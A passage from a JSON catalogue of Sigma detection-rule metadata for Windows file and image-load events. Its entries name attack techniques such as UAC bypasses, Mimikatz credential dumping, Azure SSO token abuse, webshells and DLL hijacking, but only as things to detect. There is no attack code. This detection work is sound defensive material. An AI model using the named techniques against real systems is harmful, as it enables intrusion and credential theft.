- "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce",
- "value": "Drop Binaries Into Spool Drivers Color Folder",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ],
- "creation_date": "2022/07/28",
- "filename": "file_event_win_susp_spool_drivers_color_drop.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when a file with a suspicious extension is created in the startup folder",
- "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e",
- "value": "Suspicious Startup Folder Persistence",
- "meta": {
- "refs": [
- "https://github.com/last-byte/PersistenceSniper",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ],
- "creation_date": "2022/08/10",
- "filename": "file_event_win_susp_startup_folder_persistence.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Rare legitimate usage of some of the extensions mentioned in the rule"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context",
- "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2",
- "value": "Suspicious Interactive PowerShell as SYSTEM",
- "meta": {
- "refs": [
- "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2021/12/07",
- "filename": "file_event_win_susp_system_interactive_powershell.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Administrative activity",
- "PowerShell scripts running as SYSTEM user"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of tasks from processes executed from suspicious locations",
- "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95",
- "value": "Suspicious Scheduled Task Write to System32 Tasks",
- "meta": {
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.execution",
- "attack.t1053"
- ],
- "creation_date": "2021/11/16",
- "filename": "file_event_win_susp_task_write.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of log files during a TeamViewer remote session",
- "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01",
- "value": "TeamViewer Remote Session",
- "meta": {
- "refs": [
- "https://www.teamviewer.com/en-us/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/01/30",
- "filename": "file_event_win_susp_teamviewer_remote_session.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Legitimate uses of TeamViewer in an organisation"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence",
- "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502",
- "value": "VsCode Powershell Profile Modification",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1546.013"
- ],
- "creation_date": "2022/08/24",
- "filename": "file_event_win_susp_vscode_powershell_profile.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Legitimate use of the profile by developers or administrators"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of an file in user Word Startup",
- "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d",
- "value": "Creation In User Word Startup Folder",
- "meta": {
- "refs": [
- "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001"
- ],
- "creation_date": "2022/06/05",
- "filename": "file_event_win_susp_winword_startup.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Addition of legitimate plugins"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects default PsExec service filename which indicates PsExec service installation and execution",
- "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d",
- "value": "PsExec Service File Creation",
- "meta": {
- "refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
- "https://jpcertcc.github.io/ToolAnalysisResultSheet",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569.002",
- "attack.s0029"
- ],
- "creation_date": "2017/06/12",
- "filename": "file_event_win_tool_psexec.yml",
- "author": "Thomas Patzke",
- "level": "low",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder",
- "uuid": "52753ea4-b3a0-4365-910d-36cff487b789",
- "value": "Hijack Legit RDP Session to Move Laterally",
- "meta": {
- "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2019/02/21",
- "filename": "file_event_win_tsclient_filewrite_startup.yml",
- "author": "Samir Bousseaden",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)",
- "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789",
- "value": "UAC Bypass Using Consent and Comctl32 - File",
- "meta": {
- "refs": [
- "https://github.com/hfiref0x/UACME",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2021/08/23",
- "filename": "file_event_win_uac_bypass_consent_comctl32.yml",
- "author": "Christian Burkard",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)",
- "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6",
- "value": "UAC Bypass Using .NET Code Profiler on MMC",
- "meta": {
- "refs": [
- "https://github.com/hfiref0x/UACME",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2021/08/30",
- "filename": "file_event_win_uac_bypass_dotnet_profiler.yml",
- "author": "Christian Burkard",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the pattern of a UAC bypass using Windows Event Viewer",
- "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43",
- "value": "UAC Bypass Using EventVwr",
- "meta": {
- "refs": [
- "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
- "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g",
- "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation"
- ],
- "creation_date": "2022/04/27",
- "filename": "file_event_win_uac_bypass_eventvwr.yml",
- "author": "Antonio Cocomazzi (idea), Florian Roth (rule)",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique",
- "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec",
- "value": "UAC Bypass Using IDiagnostic Profile - File",
- "meta": {
- "refs": [
- "https://github.com/Wh04m1001/IDiagnosticProfileUAC",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2022/07/03",
- "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)",
- "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb",
- "value": "UAC Bypass Using IEInstal - File",
- "meta": {
- "refs": [
- "https://github.com/hfiref0x/UACME",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2021/08/30",
- "filename": "file_event_win_uac_bypass_ieinstal.yml",
- "author": "Christian Burkard",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "file_event",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)",
- "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f",
- "value": "UAC 
Bypass Using MSConfig Token Modification - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_msconfig_gui.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", - "value": "UAC Bypass Using NTFS Reparse Point - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "value": "UAC Bypass Abusing Winsat Path Parsing - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "file_event_win_uac_bypass_winsat.yml", - "author": 
"Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", - "value": "UAC Bypass Using Windows Media Player - File", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "file_event_win_uac_bypass_wmp.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Possible webshell file creation on a static web site", - "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "value": "Windows Webshell Creation", - "meta": { - "refs": [ - "PT ESC rule and personal experience", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/10/22", - "filename": "file_event_win_webshell_creation_detect.yml", - "author": "Beyu Denis, oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "value": "Creation of an WerFault.exe in Unusual Folder", - "meta": { - "refs": [ - 
"https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" - ], - "creation_date": "2022/05/09", - "filename": "file_event_win_werfault_dll_hijacking.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", - "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "meta": { - "refs": [ - "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/06", - "filename": "file_event_win_winrm_awl_bypass.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "value": "Suspicious Word Cab File Write CVE-2021-40444", - "meta": { - "refs": [ - "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", - "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" - ], - "tags": [ - 
"attack.resource_development", - "attack.t1587" - ], - "creation_date": "2021/09/10", - "filename": "file_event_win_winword_cve_2021_40444.yml", - "author": "Florian Roth, Sittikorn S", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of the default output filename used by the wmicexec tool", - "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "value": "Wmiexec Default Output File", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1047" - ], - "creation_date": "2022/06/02", - "filename": "file_event_win_wmiexec_default_filename.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", - "value": "Wmiprvse Wbemcomn DLL Hijack - File", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/10/12", - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - 
"logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects file writes of WMI script event consumer", - "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", - "value": "WMI Persistence - Script Event Consumer File Write", - "meta": { - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ], - "creation_date": "2018/03/07", - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of template files for Microsoft Office from outside Office", - "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", - "value": "Office Template Creation", - "meta": { - "refs": [ - "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2022/06/02", - "filename": "file_event_win_word_template_creation.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of UEFI based persistence method", - "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "value": "UEFI Persistence Via Wpbbin - FileCreation", - "meta": { - "refs": [ - "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", - "https://persistence-info.github.io/Data/wpbbin.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" - ], - "creation_date": "2022/07/18", - "filename": "file_event_win_wpbbin_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "value": "Writing Local Admin Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1546.002" - ], - "creation_date": "2022/01/01", - "filename": "file_event_win_writing_local_admin_share.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter 
protection", - "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1", - "value": "Rename Common File to DLL File", - "meta": { - "refs": [ - "https://twitter.com/ffforward/status/1481672378639912960", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/19", - "filename": "file_rename_win_not_dll_to_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Application installation" - ], - "logsource.category": "file_rename", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "value": "Suspicious Appended Extension", - "meta": { - "refs": [ - "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", - "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2022/07/16", - "filename": "file_rename_win_ransomware.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Backup software" - ], - "logsource.category": "file_rename", - "logsource.product": "windows" - } - }, - { - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "value": "Abusing Azure Browser SSO", - "meta": { - "refs": [ - "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" - ], - "creation_date": "2020/07/15", - "filename": "image_load_abusing_azure_browser_sso.yml", - "author": "Den Iuzvyk", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", - "value": "Alternate PowerShell Hosts - Image", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "image_load_alternate_powershell_hosts_moduleload.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "uuid": 
"418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "value": "Microsoft Defender Loading DLL from Nondefault Path", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/08/02", - "filename": "image_load_defender_load_dll_from_nondefault_path.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", - "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "value": "FoggyWeb Backdoor DLL Loading", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587" - ], - "creation_date": "2021/09/27", - "filename": "image_load_foggyweb_nobelium.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. 
Detects meterpreter's \"load powershell\" extension.", - "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "value": "In-memory PowerShell", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/p3nt4/PowerShdll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" - ], - "tags": [ - "attack.t1059.001", - "attack.execution" - ], - "creation_date": "2019/11/14", - "filename": "image_load_in_memory_powershell.yml", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects certain DLL loads when Mimikatz gets executed", - "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", - "value": "Mimikatz In-Memory", - "meta": { - "refs": [ - "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" - ], - "tags": [ - "attack.s0002", - "attack.t1003", - "attack.lateral_movement", - "attack.credential_access", - "car.2019-04-004" - ], - "creation_date": "2017/03/13", - "filename": "image_load_mimikatz_inmemory_detection.yml", - "author": "sigma", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", - "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "value": "MSDT.exe Loading Diagnostic Library", - "meta": { - "refs": [ - "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" - ], - "creation_date": "2022/06/17", - "filename": "image_load_msdt_sdiageng.yml", - "author": "Greg (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes loading modules related to PCRE.NET package", - "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "value": "PCRE.NET Package Image Load", - "meta": { - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/10/29", - "filename": "image_load_pcre_net_load.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "image_load", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "value": "Pingback Backdoor - Image", - "meta": { - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - 